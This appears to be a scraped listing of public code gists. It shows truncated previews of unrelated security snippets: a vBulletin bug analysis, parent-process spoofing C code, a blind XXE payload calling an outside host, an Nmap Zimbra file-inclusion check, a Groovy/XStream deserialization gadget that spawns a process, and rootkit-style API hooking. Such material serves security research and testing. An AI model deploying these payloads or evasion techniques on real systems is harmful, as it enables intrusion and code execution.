This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates. | |
As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php | |
$serverData = array_merge($_GET, $_POST); | |
if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler'])) | |
{ | |
$app = $this->application['handler']; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
/* spoof.exe explorer.exe calc.exe */ | |
#include <windows.h> | |
#include <tlhelp32.h> | |
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
typedef struct _STARTUPINFOEX { | |
STARTUPINFO StartupInfo; | |
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local http = require "http" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local string = require "string" | |
local vulns = require "vulns" | |
description = [[ | |
A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6. | |
The vulnerability is a local file inclusion that can retrieve any file from the server. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Compile with -std=c11 | |
#include <stdlib.h> | |
#include <stdarg.h> | |
#include <stdio.h> | |
#include <inttypes.h> | |
#include <string.h> | |
#include <limits.h> | |
#define MAX_STR_LEN 4095 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<map> | |
<entry> | |
<groovy.util.Expando> | |
<expandoProperties> | |
<entry> | |
<string>hashCode</string> | |
<org.codehaus.groovy.runtime.MethodClosure> | |
<delegate class="groovy.util.Expando" reference="../../../.."/> | |
<owner class="java.lang.ProcessBuilder"> | |
<command> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- name: DO | |
hosts: localhost | |
vars: | |
project_name: "PUT A NAME FOR YOUR PROJECT HERE" | |
do_token: "PUT YOUR DIGITAL OCEAN API KEY HERE ==> https://cloud.digitalocean.com/settings/api/tokens" | |
repository: "PUT YOUR REPOSITORY URL HERE" | |
tasks: | |
- name: LOCAL | Generate SSH key | |
shell: ssh-keygen -b 2048 -t rsa -f ~/.ssh/{{project_name}} -q -N "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from idaapi import * | |
# with code taken from http://hexblog.com/idapro/vmware_modules.py | |
class LoadedModulesList(Choose2): | |
def __init__(self, title, flags=0, width=None, height=None, embedded=False, modal=False): | |
self.ptr = get_name_ea_simple("PsLoadedModuleList") | |
if self.ptr == BADADDR: | |
raise ValueError('Missing symbol: PsLoadedModuleList') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
FARPROC fpCreateProcessW; | |
BYTE bSavedByte; | |
// Blog Post Here: | |
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
// tasklist | findstr explore.exe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Kernel-based Virtual Machine driver for Linux | |
* | |
* This module enables machines with Intel VT-x extensions to run virtual | |
* machines without emulation or binary translation. | |
* | |
* Copyright (C) 2006 Qumranet, Inc. | |
* Copyright 2010 Red Hat, Inc. and/or its affiliates. | |
* | |
* Authors: |
NewerOlder